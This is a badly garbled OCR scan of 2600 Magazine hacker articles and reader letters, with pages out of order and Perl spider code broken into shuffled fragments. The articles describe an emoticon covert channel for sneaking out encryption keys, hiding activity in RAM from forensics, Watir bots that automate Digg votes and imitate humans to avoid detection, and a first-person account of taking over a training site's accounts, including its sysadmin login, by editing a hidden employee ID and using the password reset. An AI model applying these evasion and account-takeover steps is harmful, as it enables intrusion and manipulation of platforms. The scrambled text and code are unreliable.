recipient will read this as a " I". Once eight bits
have been transmitted, the recipient converts the
binary back to ASCII and write s the result to a file.
Wendy would have no idea that this was happening
because sbe would have no idea what emoticon the
sender chose to send because similar emoticons,
conveying similar emotions, were chosen to be
shifted by the system.
The information rate of this channel depends on
the amount of emoticons that the user uses . If we
assume that the user uses emoticons in every line
of text and sends an average of 12 to 16 messages
per minute, the throughput ofthis channel is two to
four bits per minute. Th is low throughput is accept-
able given tbe strong covertness of the channel.
This channel would be perfect for transmitting a
key of an encrypted file via MSN undetected.
The low bit rate is adequate for sending very
short messages and encryption keys . The advan-
tage of this system over other methods of covert
communication is that it is extremely plausible and
undetectable.
A few items in this system require further work
to increase and secure communication including
checksums and multiple emoticon handling to
make this channel truly lossless . In principle, this
system allows an unlimited amount of emoticons
to be used in one line of text, increasing tbe rate
of transmission exponentially. Thi s system is not
limited to just MSN messenger, but could be used
on any instant messaging system where emoti-
cons are used, including AOL messenger, Yahoo
Messenger, and even cell phone SMS .
2600 Magazine ./

by Israel
No matter who we are, most us have a secret.
Not just any secret, but one we would rather bury
dead babies than talk about. With that being said,
I, the author, only endorse the use of this article for
legal usage. I hold no responsibility if this article
is used otherwise. The purpose of this is to help
secrets remain secret!
First of all, I'm going to make an assump-
tion that you have Linux installed on your hard
drive and some form of software to play virtual
machines. Additionally, due to the fact that Mac
OSX, along with Linux , is being forged from the
flames of UNIX, these techniques may work there
as well. I'm also sure the following is different, but
possible on Windoze. For now we'll just stick with
Linux .
We are now going to hypothetically paint
a picture that you just can't seem to get a Jonas
Brothers' song out of your head . You secretly like
one guitar solo but would just die if anyone found
out. What 's worse is that your roommate is a nosy
forensics expert who is always searching your
drive when you are away at work, (It's a stretch,
just go with me for a minute). Worse yet, he's
getting smarter. Not only can he search your drive,
he can search your RAM! We could use a live
Linux distro, but that's no good against a cold boot
attack. Even though the disk was never touched,
the RAM still holds tons of traces of your every
step until it is eventually overwritten. All you want
is to hear that guitar solo before work, but he would
never let you live down a secret obsession with the
JOIlJlS Brothers. Who would?
First, we open our command line in Linux and
take a few steps:
# c d / dev /shm
" mkdir mine
it cd mine
# wget http: / /www.backtrac k.com/
-download . iso
Most of this should be self explanatory. The I
dev/shm directory might be 8 little new to you .
Much like the Iproc directory, this is 8 virtual file
system. The only difference is that we can't create
directories in Iproc, even as root /dev/shm looks
like irs a normal directory, but nothing here is
saved to disk.j l ] I know what some of you are
thinking: " Wait! When RAM is full, this will also
be paged into SWAP which is on We'll get
Spring 2011
to that later. For now just know that we made 8
directory there called "mine" then downloaded and
moved an .Iso file of the ever popular BackTrack
into it Any live distro should work here, and we
can call the directory we made anything we want.
The important part is that we download with wget
from the /dev/shrn/mine directory so it is Doldown-
loaded to disk,
Now we need to copy a virtual machine already
on our disk to this directory. For now we will just
pretend that the virtual machine we copied from
disk has Windoze XP installed on it Just go ahead
and copy the whole folder the VM is in to Idevl
sbrnlmine. If we were using VMWare Work-
station, we could easily go into the mach ine's
settings under the hardware tab, select CDIDVD,
and choose to boot from an ISO file instead of the
current OS on the virtual disk. We change this to
the location of our Back'Irack ISO in Idev/shrn and
load it up. Now we are going to be running Back-
Track from the virtual RAM of the virtual machine.
We do our dirty work from inside here . We stan up
Firefox and finally listen to that song on YouTube.
It 's almost time for work, though!
After we log out of Back'Irack, we copy tbe
original instance of the XP machine folder to I
dev/slunlmine again. When asked, choose to over-
write the file. This is very important because if we
merely deleted this virtual machine, it could still
be easily recovered. Overwriting the file would
help force the data in that memory location to be
cbanged. [2] We could also rename and overwrite
the BackTrack.ISO with another ISO if we felt the
need. Another possibility could be to overwrite the
"mine" folder we created with another containing
pictures or something else . Now our stalker room-
mate will have the challenge of searching for our
secret inside the overwritten RAM of a virtual
machine that is spread across overwritten locations
of RAM and swap.lfhe can pull this off, my hat is
off to him. But for now, no one knows my secret.
Except you ....
[I] www.cyberciti.biz/tips/what- i s
-devshm-and-its-practical-usage
- .html
[2J 2600 Volume 25, Number 3, page 51
Page2S
bv Katherine Cook
,
The Hacker
Too often .wheo someone says the word
"hacker," images of some poor schmuck living
in his parents' basement wearing Vulcan ears
come to mind. Either that or the more devious
rich unnamed evil genius living in a high class
loft with cameras spying on thefront door while
he breaks down security measures and steals
loads of cash from businesses. And while these
make for great characters in movies and on
television, they hardly represent the plethora of
individuals who simply utilize the technology
and information available in ways that "the
normals" don't quite understand.
My start in this world came by necessity.
As a kid, r was always pretty handy with new
software when my parents needed to get a home
computer. Dad was an accountant and Mom was
a teacher, and, more often than nor. I helped 10
set up and explain newapplications they needed
for work.
I was around ten (in the mid 1980s) when I
first remember doing this with a simple graphics
program thaI could make posters and cards and
such. bUI it was just accepted as normal when
I'd explain programs 10 family. As Tgrewup, the
ideaof taking this natural proclivity andmaking
it a career didn't even really cross anyone's
mind. 1 have a vague memory of wishing
there were computer classes, and the phrase
"overrated typewriter" being used.
By the rime I was in high school, I had my
own computer (Dad's old IBM compatible) for
research papers and data storage. There was
no Internet for me, it being 1990 and having a
thrifty, budget-minded mother, but I still loved
having myown computer. I think that had I been
born just a few years later, I would have been
able lO opt into computer classes that are now
offered starting at elementary levels these days.
Instead. my life took a different path. I
moved out of my parents' house just months
after graduating, no college at all. I worked
menial jobs and didn't even have access 10
a computer again until I was in my early 20s.
Married and a young mother of two, I was left
to my own devices while most of the neighbors
and my husband went to work. As I stayed home
and became used to the routine of a housewife,
Page 26----------
I was given a rebuilt PCfor the house and a 56k
Internet connection.
This was it: the gateway to a soclal life. At
least, for me il was. I had little in common with
my neighbors and was extremely shy in person.
I'rn not embarrassed 10 say that my firststop was
3 chat room, a Star Trek chat room. J honestly
couldn't thinkof anything else al the lime. I was
so unaware of what I could do thanks to a phone
line and a modem. What I did have was a secret
passion for sci-fl. one of the few things all the
females in my immediate familyhad in common
al the time.
I quickly caught on regardinghow10 operate
the more complicated online applications
and became familiar with the ability to searcb
for information and utilize: it in some fairly
strange but oftentimes useful ways. What
really fascinated me was the desktop. from the
hardware to the operating system and software.
Getting a taste of running a computer and being
responsible for its upkeep while discovering all
of the new things I could do with it was like
finally being able to read an entire book that I'd
only been able 10 viewthe cover of before.
In00 time at aJJ, lleamed about freesoftware
and firewalls, viruses and rnalware. Building
webshes, manipulating graphics, and using
services Like PIP and pop and SMTP all kept
my interest. I loved finding something new to
try or to read about. And I was finallybeginning
to understand what my true passion was. But
I'd made a deal with my husband. I was to stay
horne with the kids at least until they were all in
school themselves. So, J kept trying new things
instead.
In no time at all, I turned to online gaming,
and became familiar with patches and hacks into
game servers. Within two years, I was hopping
through networks on mIRC. So began my real
education, beginning with some coding.
The one thing that always seemed to hold
true, DOmatter wbere 1went on the Internet, was
that I was surrounded by males. (t seemed that
the population of cyberspace was an easy 10:1
in favor of those \IIith chest hair.This, of course,
meant thai any scripts thaI were available for
mIRC had remotes and pop-ups thai had been
2600 Mago.:dM

designed for the men. Great for them, kind of
irritating for me. And so, bil by bit, I began to
build my own remotes into the scripts. Simple
things likechanging WOrds in pop-ups from"he"
to "she" or simply making a few things more
gender neutral. Then I tried more daring channel
scripts and group scripts. adding designs and
colors, or building ones that were activated by
certain actions. After that, I \lias asked to help
out with scripting for channels, but quickly lost
interest with the internal politics that SO often
come into account with large groups of people
who all think they should have the last word.
While this was going on, I began teaching
myself howto fu the machine I was using more
and more. clearly recall thefirst time I had
to unhook aJJ the wires andslide the side of the
case off. My first act was to add RAM, and it
scared the you-know-what out of me. I was so
worried I'd break the machine. But of course,
I didn't. Now I change parts with the ease of a
mechanic withspark plugs. Speaking of'whicb, I
looked it uponline and did thai with my owncar.
I couldn't afford the mechanic, andmy husband
at the time couldn't afford 10 miss work, so I
looked it up and did il myself.
Ir's funny, really, the things you are often
forced to learn, simply bocause you have no
alternative. I've lookedup so many things online
thar IOSI some pQOI" plumber or mechanic a job.
I even fixed my waw- heater when the catalyst
burned out, I'm not really sure bow much a
professional charges for that, but I figure the
Internet service paid for itself that year just by
allowing me 10 access the steps I needed 10 take
in order to gel hot water running in my borne
again. Afew months later, I fixedthe furnace.
Then came mycult TVside and thediscovery
of warez. I suppose I should blame Bufty the
Vampire Slayer for ihar one. or the local cable
company. I liked the reruns on FX, but we
didn't gel UPN for the current season, so I had
to find alternate viewing choices. mIRe and the
miracle of "wildfeed" became the answer, Jt
was, of course, not the most legitimate way to
watch a show. but. at the time. il was the only
real alternative since my cable company refused
10 carry the UPN station. This was way before
hulu.com, which is kindenough to carry several
great shows for our free viewing pleasure,
including Buffy.
As the years went by and my 30th birthday
rolled around, my youngest and third child
entered the school system, which is wben 1
joined the amazing ranks of fast food. J would
have loved entering an IT field or anything
having to do with technology, bUI as I had been
home with my children for nearly a decade. fast
Spring 2011
food was all I could find when my husband lost
his job.
After a year, I could nOI take the monotony
and the belligerence of rode customers for
barely minimum wage and decided it was time
to go back to school. At the time 1 enrolled, I
had hoped thaI I could rely 00 some financial
aid through the state and federal grants, along
with help from my husband. Unfortunately, the
marriage part of the deal Willi over just months
later and ( found myself starting college at the
age of 3O-something with throe kids.
I can't complain though, and won't, These
last fewyears have been the happiest of my life.
My parents have been incredibly supportive of
my education anddreams, plus they get free PC
repair on call froma highly reliable source,
My kids teU everyone that their geeky mom
can fix a computer, although they aren't 100
pleasedwiththe fact that I'm buildinganIntranet
!hat will 001 onJy limit their Internee surfing for
my peace of mind, but that they won't be able to
log on if it isn't their set time. I haven't exactly
told them thai I can take over their sessions and
find om where they went andwhat they typed.
But it will be pretty cool if one of them tries to
break through my restrictions SOUICday.
My boyfriend is the one who said I should
tell my story. I still don't knowif I really qualify
as a hacker. I'm just 3 single motherof three who
doesn't take my PC to The Geek Squad wben
it breaks, mostly because the lasl time I did, I
ended up providing more customer service for
feUow customers than 1 got from the so called
"experts."
But when asked, "What is a hacker?" it
seems to me it's anyone who can take what'Sout
there and use it. crack it, patch it, fix it, utilize
it, and maybe even improve and share il with
others who love 10 breakthe unbreakableand fix
the unfixable, 1suppose my life has beena series
of little adventures that lead to new obsessions
and newknowledge, And as for advice, all I can
say is: When you find a barrier, see if you can
push it. When you hear a stereotype, embrace it.
And when you lind a great hack, share ir.
Katherine Cook currently resides In Fort
Wayne, Indiana with her three children . She
writes for a ....ebsite as a local correspondent on
"cyber safety for pareras." One of her favorite
pastimes is 10 inform others on how 10 use the
Internet and their computer systems in ways IMt
can not only inform andeducate, but help them
save a jew dollars a.r well.
Page27
Come and share ideas for talks, find out how to volunteer,
or start your own discussion thread
You CAN BE PART OF THE PLANNING FOR OUR NEXT CONFERENCE
IN NEW YORK CITY BY JOlNING THE ONLINE DISCUSSION.
The HOPE Forums (talk.hope.net) have topics on everything from
infrastructure to art, keynote speakers to workshops and projects,
lockpicking to Segways, and much more!
the same warhead which made il easy to watch for
problems.
So, 10 show you the spider, ( plucked (lUI
the warhead scripts and eliminated variables and
scaled down Level Two, The (\1,'0 files J will give
you arc the spider framework and !he searchdau.
OIL I had 3000 URI...s in my searchdaia.rxt, 1 have
never seen the end of the file. Stripping links off
pages and running the warhead scripts 00 the llnks
in two 10 three levels can lake a very. very long run.
The searchdata.rxt file can have any URL in il bUI il
has 10 be in a certain fon:nat for !he Hnp::RequcsI.
II Deeds 10begin with http://.rwillieave you with a
fewexamples in Figure I.
Most of the spider's lime will be spent in
searching the stripped links. This is because there
is OD]y one home page and il cao have 1-500 links
to oth.. "\' pages . I f you have a third layer, it could be
hours before il comes back to the ammo dump and
grabs another home URL. As always. I want to StI\.'U
that this is just a leaching article whicb is why I took
OUI any of the scripts that might be used for mali-
cious purposes. 1also wish 10apologize 10 the !'No
researchers who gave me the framework so I could
give them their ngblly dues for their article, Truth is,
I looked for hours for that PDF tile thai taught me
about this spider. I have been looking for it for years
and Malty (jUS! gave up, boping I would run across
the article by mistake one day. If (1j]JI contacted by
them, ( will surely let them know. Again, they gave
me no code. The code is mine. Another thing 10say
is 10 always use good spider/crawler practices and
abide by the site's robot.txt laws, Saying that, I gOI
me a good lesson in Reg)( and Perl,
Figure I will show you the setup of the URL
feeding file for Level One. One thing 10 remember
is to leave a spaceat the top of the URL list. I don't
know wby ; it just works that way. If you find il
difTen:tI!, men by all means make: il run your way.
Make sure yoo have !be spider.pl and the searchdata,
lXl flle in the same directory or you'll gel one of my
colorful error texts, Any URL you want C3.Il belisted.
lfthc spider fails in the middle of a run. look al the
URL. II probably has something wrong in the URL
thai the spider doesn't like. Don't blame the spider
right otT. ADd again. it will slart at the top of the
searchdata.txt lis! if it is stopped for any problems.
Figure 2 shows the sian of the spider run,
showiog Level I l/R.ls and Level 2 URLs and what
the beginning of a run will look like. r also wam
to say thai chis prngrarn was wrinen in Windows
Perl (Activef'erl). DoO'1 throw rocks at IDC yet I
just didn't \mow Linux at thai lime. I am paning il
DOW and it should be a breeze because ActivePcrl
emulates Linux Perl effectively. The code is also
commented very well,
Good Luck.
Figure I:
h t tp ://slat e . url.com
h ttp : //url . u r l . com - This is how me search-
dlIla.lXt sbould be up with one space at the lOP
anti one line in between. This must be in a separate
file witbspider.pl and scarchdsta.txt also in the same
----------Page29

by Triad@Efnet
Let me say this: the idea for the spider is nOI
mine. I read in 2005 a PllD paper thlll was wrinen
by (\1,'0 researchers fromthe University of Chicago.
They called this spider a weapon and would nOI
give the code. But they did give me one clue and thai
was thaI il was made from Perl. I did not know Perl
nor did I knowbow10 build spiders (or web crawlers
if you will). With what r read and what I researched,
r built !he weapon aodit works· and il works good.
Tbat was in 2005 and I think the paper was
written in 1998 (give or take a year) . Now, the spider
weapon is mosLly obsoIete, or rather the weapon
involved now mostly outdated, The links il used
on the large! page have been replaced by most high
level web developers with Javascript. So it is lime
to retire lhe main weapon used on the spider. The
one thing I can say is that the code is mine. The
researchers gave me the idea and the frameworkand
I did the coding and made the spider worll.. Like the
researchers, I wiII not give you the weapon code. But
I will give you the spider code. 1\is Perl and it is easy
(0 understand, especially if you know Perl (you will
note that ruse Perl like Basic).
Looking 31 tbe code from the lop, the tlrsl thing
you see are the variables. Most variables used in
me warheads an: gone eo make the spider faster and
more efficient. So if you sec some variables and
can 't find them on the code. il probably was used
1lO the warhead. The $file variable is used to load
the searchdata.txt file. This is used as an ammuni-
nOD dump for the warhead. This file is loaded WIth
URLsthai are used one 51 5 time: for processing and
stripping links for the level two warhead processing.
The next section is the spider/ageol setup area.
This area uses Perl libraries (LWP::UscrAgeol) 10
SCi up !he spider. The spider will DOt work if the
agent libraries are not listed. The next section is for
loading the URLs from searcbdata.txt, Again, this
array is used (0 feed the spider URLs 10 keep the
spider crawling. Once the ll1TIIy is tilled with URis,
this tile is dosed and no! used again unless the spider
is stopped and restarted.
OK, DOW it's lime launch the spider. In the next
section, the spider begins by grabbing a URL from
the array and then using sorne routines fromthe Perl
libraries, calling the URL, and seeing if WC gCI a
response. If so, then the spider strips the links off
the lim page and stores. II then releases the warhead
00 the first page and does wbat it' s supposed 10 do
(looking for certain data, CK.). When Level One is
complete, then Level Two begins its job. Level Two
uses an array thai was f lied WIththe links fromstrip-
ping links off the Level One page.
I am showing you Level Two very scaled down.
Truth is, it can be set up 10 run a second level
warhead and strip Iiaks off lhe second level URl.s
and create a mird level warhead. I did go 10 three
levels and il worked very well. All of my levels used
Spring 2011
2600 Magazine
httpstttalk.hopenet!
Page 28----------------
Preparation for HOPE Number Nine is
now underway for Summer 2012!
#TDM 2005
my $x=O; #used on the FORM FILL Area on $sizeofharvestedURls index
my $y=O; #used to index thru FORMS on page
my $q=O;
my $z=O; #Level I index
my $a=O;
my $b=O;
my $c=O;
my $d=O;
my $e=O; #Level II index
my $p = HTML: :LinkExtor->new(\&callback);
my $input = 0; #Used to input data from files
my @harvestedULs = ();
my $sizofharvestedURLs = 0;
my $sizeofinput = 0;
my $url = ""; #Level I
my $ur12 = "n; #Level II
my @links = ();#stripped links array
my $sizeoflinks = 0;
my $counter = 0;
$file = ·searchdata.txt
n
; #DOT.COMS from searchdata.txt file # Enter into level 3 #
#****************** LVL 2 - BEGIN ******************************
while($c <= $sizeoflinks ) (#xxx
$ur12 = $links[$c++];
print ·$ur12\n";
print ·Level 2 STRIPPED URL\n\n·;
sleep(10); #used to slow down for viewing the spider operation
########################### Begin Spider ###############################
print ·\n\n Begin Spider run ..... \n\n·;
while($x <= $sizeofharvestedURLs) {#aa #Loop for harvestedURLs
$url = $harvestedURLs[$x]; #uses $x for indexing
print "-- Home Page -- Level I -- $url\n\n";
sleep(l); # used to sow down for TOR.
#$counter++;
#print "$counter\n";
$req = new HTTP::Request GET => $harvestedURLs[$x];
$response = $ua->request($req);
my $base = $response->base;
** End LINK STRIPPING **
# Here is where you set up for a run on home page #
LINK STRIPPING **
@links = map { $_ = url($_, $base)->abs; } @links;
#print "@links"; # test point for link stripping
$sizeoflinks = $#links;
if ($response->is_success) {#bb
sleep(2); # Used to slow down for TOR
$p->parse($response->content) ;
}#bb#
#
#
http://www.url.cn/id/2257378/
- # The last 3 URLs were stripped
- from the Level one URL.
Level 2 STRIPPED ur1
- # TOR CAN ALSO BE USED AND
- IT IS EXPLAINED IN THE CODE.
# These are fake URLs
- ( I hope you see this :)
Level 2 STRIPPED url http://
-www.url.url.com!view!2057067!
spider.pl
directories.
http://13.url.abc.edu
Figure 2:
******** Loading URL's *******
Seed URL's = 3
Begin Spider run
-- Home Page -- Level I
- http://slate.url.com/
http://www.url.edu/
Level 2 STRIPPED url
#
Set up Agent ------------------------------
require LWP::UserAgent;
use HTML::LinkExtor;
use URI: :URL;
# Exiting Level 3 #
# Here is where you set up for a run on Level 2 #
Sua = new LWP::UserAgent;
$ua->timeout(5); #not sure of this
number. Ex. code had 5, I put in 5
$ua->agent('Mozilla!4.75');
# $ua->proxy(http => 'http://127.0.0.l:8118'); # TOR TOR TOR
$ua->from(.www.xxxxx.com.);
}#xxx Exit Level 2
#******************** LVL 2 - END *****
$c = 0; #reset level 2 Slinks variable
$x++; # Used on $harvestedURLs[$x]
@links = ."; # makes sure that @array is empty
}#aa Exit Level 1
######################### END Spider ###########################
#----------------Load URL's array with links --------------------
print "\n\n******** Loading URL's *******\n\n";
if (open(A, ·$file·) == undef) {
return ( print ·\n\n\nSHIT !!! Cannot open the file: ( \n\n\n");
exit (-1) ;
} #endif ()
while«A» (
$input=<A>;
push(@harvestedURLs, $input);
}#endwhile ()
close (A);
$sizeofharvestedURLs = $#harvestedURLs;
print "Seed URL's = $sizeofharvestedURLs\n\n";
sleep(2); #used to let array to settle in
Page 30 2600 Magazine
#----------------------Link Stripping Sub-Routine---------------
sub callback ( #999
my($tag, %attr) = @_;
return if Stag ne 'a'; # Tag to strip <a>, <img>, .... etc
push(@links, values %attr);
#999 End sub callback
#------------------------------------------------------
# TDM 2005
# Updated Feb. 01, 2008 -- Triad
# Update Apr.29.2010 - Triad
# Updated June 19 2010 - Triad
################################################################
Spring 2011 Page 31
-------------------Page33
....
try putting in different wail times and looking for
differeol teXI to show up in the body.
Withjust this short intro, you should be well on
your wait to creating your own bots. Aside from the
Jcaj iggcring, it's easyto do. Using Watir for bois will
woo 011 any site, 00 maner how much obfuscation
and COuntemJC3SUJ'eS they use. 1f you can go there
and click on these ihings yourself, there's very little
they cando 10 stop these bots. Here arc some other
things to thinkabout,
BoIS often try to hide themselves by passing
realistic user agents and other headers, but they Call
be found by examining server logs. It 's pretty suspi-
cious if'all aile userdoes is log in, go to the top news,
and immediately vote the top link up. Youcanhide a
bot by having icacl more like a bUI1l3n. Wail random
times 10 simulate reading, click on other liaks (thai
it malces sense to click Oil). wait some more, then
perform dle task needed. That would be extrernety
di fficult 10 detect,
This still doesn'tgel around CAPTCHAs (those
annoying scrambled letters), However, those usually
OIIly appear 00 registration forms. Depending 00 thc
sire. this may or may nOI be a problem. There arealso
some libraries aroundthaI can read these. However,
they're usually purpose-built for certain sites and
won 't work on the really goodones anyway.
By itself, Watir won't work with other technolo-
gies embedded in the page such as Flash, Java or
Silverlighl. There are some projects such as ftasb-
warir 10 solve this, l»J1 support is pretty thin. They
mayor maynot work for you.
You can get snd store the enI ire text of a web
page in its current state by using the"text" method.
This can be used 10 store entire pages for mirroring
purposes, or be parsed more carefully with libraries
such 8$ Nokogiri .
Here arc some ideas of what you can do with
this.
Makesmart bco/t:mbrks. I've often oied 10 book-
mark things, bUI bec:aWlC they use JavaScript aod
POST requests and other uo-bookroarkable things,
you can't usea normal booknlaJiL Youcan use Watir
W open up the page for you Ibough.
Provirk YOIl' own API/a, a sue. Many sites
provide an API for you 10 usc, but you woo't need
one. You can use the site direclly. Wnlp this up in
your own API and il'lI be evCll easier to wrile yow
own boISfor the sileo
Aulomale common lasks. Continuing with !he
Digg =mple, whal if you wanted lO aUlomatically
digg any story with the word -Ruby· in tl1e title? Sec
this to loop and watch Dewstories, and it'll spread
the Ruby love without you lifting a finger.
Muchief We've been danciog around this
subject for the aniele. ['II leave il up Ul you
as 10 jusl how mischievous you wanl W be, bucthe
possibilities are endless. Though if you're up lO
something really miscbievous, maybe you should
throw Tor into the miJ:!
-..
by MJchaei Morin
Writing "bots" for crawling or manipulating
websites used to be 8$ simple as requesting HTML
pages from a web server and parsing the HIMC.
However, modem sites (or "web applications") often
require JavaScripl to function, Instead of trying W
integrate JavaScript into your bot, you can usc Warir
(pronounced "water"), a Ruby library for controlling
web browsers.
Watu- is available on all major platforms and
its various flavors (whicb include Watir, FireWatir,
SafariWatir, and Watir-WebdJiver) can coorroI all
!he major browsers. You'll need a worlOng Ruby
installation C compiler. r recommend RYMon
Linuxor as X, or Rubylnslaller with the DevKit 00
Windows. You can then WlC the gem command to
install a flavor ofWalir. Another thing you'Il need is
a browser with a good OOMinspector, like Firefox
4, Fircfox with Firebug. or Chrome. "View Source"
isn'l going to work here.
Once you gel up and running, using Warir is
pretty easy. This example program will open up
Google and search for -Watir.-
r equire 'rubygems'
requ ire ' wa t i r - webdr i ve r '
b = Wa tlr , : Br ows er . new :nrefox
b.go t o ·google.com'
b .t ext-neld( :name, 'Q') . s e t ' Wa t l r '
b .button( :name, 'btnG') . c l i ck
That's nOl too exciting though. Let's open up
digq , com (like jl or not, bUI it uses a 101 of lavaS·
en pi), log in., go to the top news stories and digg the
topone.
requ ire ' r ubygems '
requ ire 'watir-webdriver'
b = Watir: : Browser. new :firefox
b.goto ·digg.com'
b.link(: t ext, 'Login') .click
s lee p 1 unt i l
.. ' Login to Oigg'
b .te xt-fie ld(:name, 'ident' I .set
.. ' your usern3Il1e'
b . tel<t-neld ( : narne , ) . set
.. ' your pa s swor d '
b.button(;text. 'Login ') .cl i ck
sleep 1 • Hay need ka j i gge r i ng
b . 11nk( :text , 'Top News') . c l i c k
b .divsl :class. 'storY-item' l . fir s t . li nk
.. (: t ext, 'digg' :
Youcan sec here why this can be so oicky. When
you go to Digg and click Login, you geL a new login
form in lhe middle ofllle page wasn'l part oflM
original HTML returned by the firsl HITP request.
This is referred to as "AJAX." The server is returning
new bils of HTML and the page is inserting them
into the DOM l1ce. This is whal makes writing bots
without JavaSaipl so hard these days.
You can also sce some challenges in wriling
boISwith Walir. It just takes some kajiggcring, like
sleeping at certain points and waiting ror some teJ:1
to appear on the page. Trial and error is in order here
rod you'll gel a feel for when waiLing is needed. Each
site aclSdifferently, and sometimes you just have to
Spring 2011
,
••
connnued to look through the code 011 the sit e and I
made a preny long list.
The things [ fouod wen: interesting, ThL"fI: was
no real security Oil the site at all. They were just
giving the illusion of security, It starte d OUI simply.
l noticed that when you clicked the logout bunon at
the top of the page, all il did was bring you back
to the home page. lf you were to dick "back, you
would find yourself still logged in.
From this poinc on I'm going 10 refer 10 the
site as http; / / t r a i ni nq s i te . com/ . To
login, I had to post a usa name and password to
http ://trainingsit e . c o m/ l o g in_
" reveri fy . a s p. I fouod thaI if 1posted a blank
usa name and password, it would log me in asTorn
Smith. AI first, ( felt bad for Tom Smith. BUI I later
found OUI that ic was not really his account. Wben 1
went 10 his personal infa p3gc. I found iI all blank.
BUI I had also noticed while looking at the code of
the personal info page, there was a hidden variable
called "ernployeeid." Tom Smith's was 127. When I
logged in asmyself, the ernployeeid variable was 52,
So I once again logged in to Tom Smith's account
and used J'lfl:bug to change the ernployecid vari-
able 10 52. Then I entered an email address from
ht t p : / /1 0mlnu t ema i l . com and submitted
the form. I then went 10 the "I forgol my password"
page and entered the fake email address. In about a
minute, ( received my user name and password.
Knowing this, I tried il again but entered "l "
for the ernployeeid. What did I get when the email
arrived? Uscrname: sysadmin and password:
sysadrnm, That is right, If] was to start guessing user
names and passwords, I would bave gotten ill and il
would have only taken a few minutes, I now had the
ability 10 change the site settings. The whole thing
was at my control. I could also see everyone's email
addresses Md p3$Swords. I found thaI there were CWo
Tom Smiths listed and the one I was able to access
withoul a user name or paS.!word was not the real
Tom Smith.
Most people had kept their default user oamc
and password, which was the firllc lener of their
first llalT1e and their lasl name (Example : ISmith)
for both user name and password. I full bad for Ibe
few people who were sman enough to change their
password Hopefully they know enough nol W usc
the same password for their email alXOuots. Other-
wise,anyone wbo figured out whal ( did would have
a=to their email accounts.
I SCOI all this informaLion 10 my employer.
Nothing bas been dooe yel and it has been week5.
But. wben you arc surfing the web, keep this in
mind, VBSenpi should nOI be used 00 a web page.
If ic is being uscd. the site designer most likely bas
link knowledge on web deliigning and most likely
jusl took some class so he could make a few bucks
When you see VBScripl being us.:d, poke arouod.
Youjust might find:lQmetbmg.
2600 Magazine
by MctalxlOOO
About fOUf months ago, my employer hired an
out of state company 10 set up a website. My job
requires constant training, Wearc required to meet a
minimum number of training hours each year. This
new website was designed to help us keep track of
classes we need to take ali well ali the Dumber of
hours we have already put into training.
I had been pushing for my department co start
going web-based. Currently we're using FikMaker
Pro on some not-roo-fast machines. So, I was hoping
that using lighter weight web applications would
help speed things up. I was also hoping 10 rumthem
in the direction of open source and Linux at some
point down the line. If everything we used was web
based. il would belp the transition.
Allbaugh I was hoping 10 design the site myself
and hasI it locally, I was still happy 10 sec us heading
in that direction, That is, untiI the first time I tried
to log on to the site. I typed in my user name and
password. rhil "Enter," Nothing happened. I clicked
the login burton. Srill nothing, So I decided to lookat
the page's source code. I saw what the problem was
right away. They were using VBScripl.
Now, I think VBScripl is great for automating
things on a Windows machine. But. no web designer
would use il on 3 web page. When designing a web
page, one of the maio goals should be to make it as
compatible with as many web browsers as possible.
VBScripl only works in Internet Explorer. I'm using
Firef'ox 011 a Linux box. I could install lnternet
Explorer through Wine. BUI I was not about to do
thal
Wrththe option of using lnternet Explorer otfthe
table, I had to find another way 10 gel this site 10
work for me. ( needed a way 10 cbange the: VBScripl
to JavaScript for my lISe. FireFox add-oos (0
rescue! I was able to .:asily change the YBScript to
JavaSeript with the FireFox add-oo called Firebug.
Firebug allows you 10 ehange: the code of a page you
are viL"Wing one.: it is loaded. It only changes il in
your browser for thaI one rime, but il did the job.
Although I found 8 workarouod for myself, I still
senI lhe site designer an email informing him of the
issue. He replied quickly and told me thac be was
aware of the issue and he was working on changing
oul all of the VBScnpt.
( fouod thaI a nwnber of the pages on the site
ODce I logged in bad VBScripl in them. r rewrote the
scripl for three of the pages and emai led them 10 the
designer. He thanked me and lold me Ollce he looked
themover, be would replace the old code on the site.
llLal was three mooths ago. He bas not changed a
thing.
So, Ul gel the site to work for me, I was
constanlly having to look al the code and nnd work-
arounds. While doing this, I fouod 3 number ofsecu-
rily problems. I infonned my employer of the issues
and I was lOld 10 make a list and email illO them. I
Page 32
Gratitude
Dear 2600:
First, I just wanted to thank you for finding
my new address and updating it when I failed
to tell you that I moved. Somehow, my issue of
2600 found its way to my new address with the
correct address label and such . I was a little para-
noid at first, but then realized the post office more
then likely was responsible for the update. I also
wanted to tell you how excited I am about the
new digital edition of your prestigious magazine,
however I do wish you had a secure download
web server. I'm not too sure about Amazon.
rOWnl
We are quite relentless in tracking down sub-
scribers who have either moved or escaped. A 2600
subscription is simply not something you can walk
awayfrom . As for the digital edition, we believe Am-
azon is as secure as any other such online service.If
we learn otherwise, we'll let the world know.
Dear 2600:
I'm a Brazilian guy called Guilherroe. Not a
hacker, not a cracker, nor a lamer. I write this be-
cause I wanted to thank you for the documentary
Freedom DOWTItime. That documentary really
woke me up to life . But the bad thing is I just
watched it yesterday which makes me too damn
late.
gui
Just because the story rook place in the past, why
would it be 100 late for you 10 gel involved in the
hacker world? If you read PlaIO. are you 100 late
10become interested in philosophy? Would reading
a Shakespeare play make you feel like you missed
out on all the fun? (This, incidentally, is likely the
only time our film will ever be compared to Plato
and Shakespeare.) The point is, there :s a lot 10 learn
from what happened in the film and much that can
be applied 10 the world of today. Gelling involved
because of something in the past is a great way 10
create a nifty future.
Page34
Dear 2601J:
Just a quick note to say thank you for putting
out Volume 26 as a DRM-free PDF file. I bought
it today and am very pleased! I'd like to say that
if you have an option for the paper magazine and
PDF, I'd happily buy that. I would also love back
issues as PDFs, assometimes I remember reading
an article, but can't remember which issue it's in.
WTL
We're working on all sorts of options and vari-
eties and we appreciate the feedback. Our goal is
always 10 go with the DRM-Jree option, but some-
times we run i1l/0 snags with various vendors who
don 't support this . We will continue 10 keep people
informed at every step so thai you know where it all
stands. In the meantime, supporting our efforts help
make it all possible in the first place, so every bit of
that from our readers is extremely important.
Fun Facts
Dear 2600:
I purchased a 2600 today from Barnes and
Noble. It was $625 with 6j percent Florida sales
tax which brought the total 10 $6.66. I thought
you might find that interesting.
IntemeffougbGuy
We do find it interesting and we 've received all
kinds of pictures of receipts from people in Florida
(as well as some other places) wilh this amusing
fact, We are also envious here in N ~ York where we
den 'I gel 10pay sales tax on reading material.
Dear 2601J:
I thought you might find it interesting that
here in Lexington, Kentucky, I saw a TV com-
mercial warning that Time WarnerCableis going
to lose the Fox channel (the freeTVchannel),just
as you had the Cablevision deal up there . Some
fun these corporation have. right?
Nathan
II just goes 10 show why these corporations
should never be trusted with more than their own
2600 Magazine
\
J
\
J
